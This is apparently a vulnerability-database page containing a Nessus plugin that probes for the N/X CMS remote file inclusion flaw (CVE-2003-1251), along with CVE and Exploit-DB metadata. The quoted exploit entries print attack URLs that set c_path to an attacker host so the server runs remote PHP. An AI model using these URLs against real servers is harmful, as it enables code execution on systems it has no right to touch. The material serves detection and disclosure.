N/X Web Content Management Multiple Script Remote File Inclusion
2003-02-17T00:00:00
ID NX_WEB_CONTENT_FILE_INCLUDE.NASL Type nessus Reporter This script is Copyright (C) 2003-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2003-02-17T00:00:00
Description
It is possible to make the remote host include PHP files hosted on a
third-party server by way of the N/X Web content management system.
An attacker may use this flaw to inject arbitrary code into the remote
host and gain a shell with the privileges of the web server.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
# Metadata block: taken only when `description` is set. It registers the
# plugin's identity, advisory references, scoring and run conditions, then
# exits, so nothing in this branch sends traffic to the target.
if(description)
{
# Plugin identity and the advisories it tracks.
script_id(11233);
script_version("1.25");
script_cve_id("CVE-2003-1251");
script_bugtraq_id(6500);
script_name(english:"N/X Web Content Management Multiple Script Remote File Inclusion");
# NOTE(review): the summary says "presence of menu.inc.php", but the check
# further down requests that script with a c_path value and matches the
# response body, so a finding reflects observed behaviour, not mere presence.
script_summary(english:"Checks for the presence of menu.inc.php");
# Text shown in the scan report.
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
multiple remote file include vulnerabilities." );
script_set_attribute(attribute:"description", value:
"It is possible to make the remote host include PHP files hosted on a
third-party server using N/X Web content management system.
An attacker may use this flaw to inject arbitrary code in the remote
host and gain a shell with the privileges of the web server." );
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2003/Jan/7" );
# No fix is recorded here, so a report from this plugin carries no remediation
# step of its own. NOTE(review): operators presumably have to fall back on
# compensating controls (restricting access to the affected scripts, disabling
# remote URL includes in PHP) - confirm against current vendor guidance.
script_set_attribute(attribute:"solution", value:"Unknown at this time." );
# CVSS v2 and v3 base/temporal vectors; the score source is the CVE entry.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:W/RC:ND");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L");
script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:W/RC:X");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2003-1251");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"plugin_publication_date", value: "2003/02/17");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
# ACT_ATTACK: the plugin is categorised as one that actively probes the target
# (it issues a crafted GET request) rather than inferring from banners.
script_category(ACT_ATTACK);
script_copyright(english:"This script is Copyright (C) 2003-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"CGI abuses");
# Run conditions: depends on http_version.nasl, needs a web service port and
# the www/PHP knowledge-base key, and is excluded when
# Settings/disable_cgi_scanning is set.
script_dependencie("http_version.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_keys("www/PHP");
# Registration is complete; leave before the probing code below is reached.
exit(0);
}
#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
# Pick the HTTP port to test (80 is the default passed to the lookup) and
# leave quietly when the server cannot host PHP: the flaw is in PHP scripts,
# so probing a non-PHP server would only add noise.
port = get_http_port(default:80);
if (!can_host_php(port:port))
{
  exit(0);
}
# check(loc): probe one candidate install prefix for the c_path include flaw.
#
# loc - path prefix under which /nx/common/cds/menu.inc.php is requested.
#
# The request sets c_path to http://example.com/ and the full response
# (status line, headers, body) is searched for a line that mentions an
# http://example.com URL under common/lib ending in .php. Such a line is
# presumably a PHP include warning, i.e. evidence that the script built an
# include path from the caller-supplied value. example.com is a reserved
# documentation domain, so the probe does not point the target at live code.
#
# NOTE(review): the match depends on the error text being shown in the
# response. A host with PHP error display turned off would not be flagged
# even if affected, and a host where remote URL includes are disabled may
# still print the path and be flagged - triage findings with that in mind.
#
# Side effects: reads the global `port`; on a match reports via
# security_hole() and ends the plugin with exit(0); when the server gives no
# answer the whole plugin ends with exit(1), not just this location.
function check(loc)
{
  local_var res, url, haystack;

  url = string(loc, "/nx/common/cds/menu.inc.php?c_path=http://example.com/");
  res = http_send_recv3(method:"GET", item:url, port:port);
  if (isnull(res))
  {
    exit(1, "The web server on port "+port+" did not answer");
  }

  # Join status line, headers and body so the pattern sees the whole reply.
  haystack = strcat(res[0], res[1], '\r\n', res[2]);

  if (egrep(pattern:".*http://example.com//?common/lib.*\.php.*", string:haystack))
  {
    security_hole(port);
    exit(0);
  }
}
# Probe the web root first, then every CGI directory known to the scanner.
# check() ends the plugin on its first match, so at most one finding is
# reported for the port even if several prefixes would match.
check(loc:"");
foreach dir (cgi_dirs())
  check(loc:dir);
{"id": "NX_WEB_CONTENT_FILE_INCLUDE.NASL", "bulletinFamily": "scanner", "title": "N/X Web Content Management Multiple Script Remote File Inclusion", "description": "It is possible to make the remote host include PHP files hosted on a\nthird-party server using N/X Web content management system. \n\nAn attacker may use this flaw to inject arbitrary code in the remote\nhost and gain a shell with the privileges of the web server.", "published": "2003-02-17T00:00:00", "modified": "2003-02-17T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/11233", "reporter": "This script is Copyright (C) 2003-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://seclists.org/bugtraq/2003/Jan/7"], "cvelist": ["CVE-2003-1251"], "type": "nessus", "lastseen": "2021-01-20T12:24:11", "edition": 25, "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2003-1251"]}, {"type": "exploitdb", "idList": ["EDB-ID:22115", "EDB-ID:22116"]}], "modified": "2021-01-20T12:24:11", "rev": 2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2021-01-20T12:24:11", "rev": 2}, "vulnersScore": 6.6}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif(description)\n{\n script_id(11233);\n script_version(\"1.25\");\n\n script_cve_id(\"CVE-2003-1251\");\n script_bugtraq_id(6500);\n\n script_name(english:\"N/X Web Content Management Multiple Script Remote File Inclusion\");\n script_summary(english:\"Checks for the presence of menu.inc.php\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple remote file include vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"It is possible to make the remote host include PHP files hosted on a\nthird-party 
server using N/X Web content management system. \n\nAn attacker may use this flaw to inject arbitrary code in the remote\nhost and gain a shell with the privileges of the web server.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2003/Jan/7\" );\n script_set_attribute(attribute:\"solution\", value:\"Unknown at this time.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:W/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:W/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2003-1251\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2003/02/17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_copyright(english:\"This script is Copyright (C) 2003-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"CGI abuses\");\n\n script_dependencie(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\nif(!can_host_php(port:port)) exit(0);\n\nfunction check(loc)\n{\n local_var w, r;\n\n w = http_send_recv3(method: \"GET\", item:string(loc, \"/nx/common/cds/menu.inc.php?c_path=http://example.com/\"), port:port);\n if (isnull(w)) exit(1, \"The web server on port \"+port+\" did not answer\");\n r = strcat(w[0], w[1], '\\r\\n', w[2]);\n if(egrep(pattern:\".*http://example.com//?common/lib.*\\.php.*\", string:r))\n {\n security_hole(port);\n exit(0);\n }\n}\n\ncheck(loc:\"\");\nforeach dir (cgi_dirs())\n{\n check(loc:dir);\n}\n", "naslFamily": "CGI abuses", "pluginID": "11233", "cpe": [], "scheme": null, "cvss3": {"score": 8.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L"}}
{"cve": [{"lastseen": "2020-10-03T11:33:03", "description": "The (1) menu.inc.php, (2) datasets.php and (3) mass_operations.inc.php (mistakenly referred to as mass_opeations.inc.php) scripts in N/X 2002 allow remote attackers to execute arbitrary PHP code via a c_path that references a URL on a remote web server that contains the code.", "edition": 3, "cvss3": {}, "published": "2003-12-31T05:00:00", "title": "CVE-2003-1251", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-1251"], "modified": "2008-09-05T20:36:00", "cpe": ["cpe:/a:nx:n_x_web_content_management_system_2002:prerelease1"], "id": "CVE-2003-1251", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1251", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:nx:n_x_web_content_management_system_2002:prerelease1:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-02T18:00:23", "description": "N/X Web Content Management System 2002 Prerelease 1 menu.inc.php c_path Parameter RFI. CVE-2003-1251. 
Webapps exploit for php platform", "published": "2003-01-02T00:00:00", "type": "exploitdb", "title": "N/X Web Content Management System 2002 Prerelease 1 menu.inc.php c_path Parameter RFI", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-1251"], "modified": "2003-01-02T00:00:00", "id": "EDB-ID:22115", "href": "https://www.exploit-db.com/exploits/22115/", "sourceData": "source: http://www.securityfocus.com/bid/6500/info\r\n\r\nN/X Web Content Management System is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers.\r\n\r\nAn attacker may exploit this by supplying a path to a maliciously created file, located on an attacker-controlled host as a value for some parameters.\r\n\r\nIf the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. Successful exploitation may provide local access to the attacker. \r\n\r\nhttp://[target]/nx/common/cds/menu.inc.php?c_path=http://[attacker]/\r\nwith :\r\nhttp://[attacker]/common/lib/launch.inc.php", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/22115/"}, {"lastseen": "2016-02-02T18:00:32", "description": "N/X Web Content Management System 2002 Prerelease 1 datasets.php c_path Parameter LFI. CVE-2003-1251. 
Webapps exploit for php platform", "published": "2003-01-02T00:00:00", "type": "exploitdb", "title": "N/X Web Content Management System 2002 Prerelease 1 datasets.php c_path Parameter LFI", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-1251"], "modified": "2003-01-02T00:00:00", "id": "EDB-ID:22116", "href": "https://www.exploit-db.com/exploits/22116/", "sourceData": "source: http://www.securityfocus.com/bid/6500/info\r\n \r\nN/X Web Content Management System is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers.\r\n \r\nAn attacker may exploit this by supplying a path to a maliciously created file, located on an attacker-controlled host as a value for some parameters.\r\n \r\nIf the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. Successful exploitation may provide local access to the attacker. \r\n\r\nhttp://[target]/nx/common/dbo/datasets.php?c_path=http://[attacker]/\r\nwith :\r\nhttp://[attacker]/common/dbo/saveset.php\r\nhttp://[attacker]/common/dbo/recordset.php\r\nhttp://[attacker]/common/dbo/deleteset.php\r\nhttp://[attacker]/common/dbo/updateset.php\r\nhttp://[attacker]/common/dbo/insertset.php ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/22116/"}]}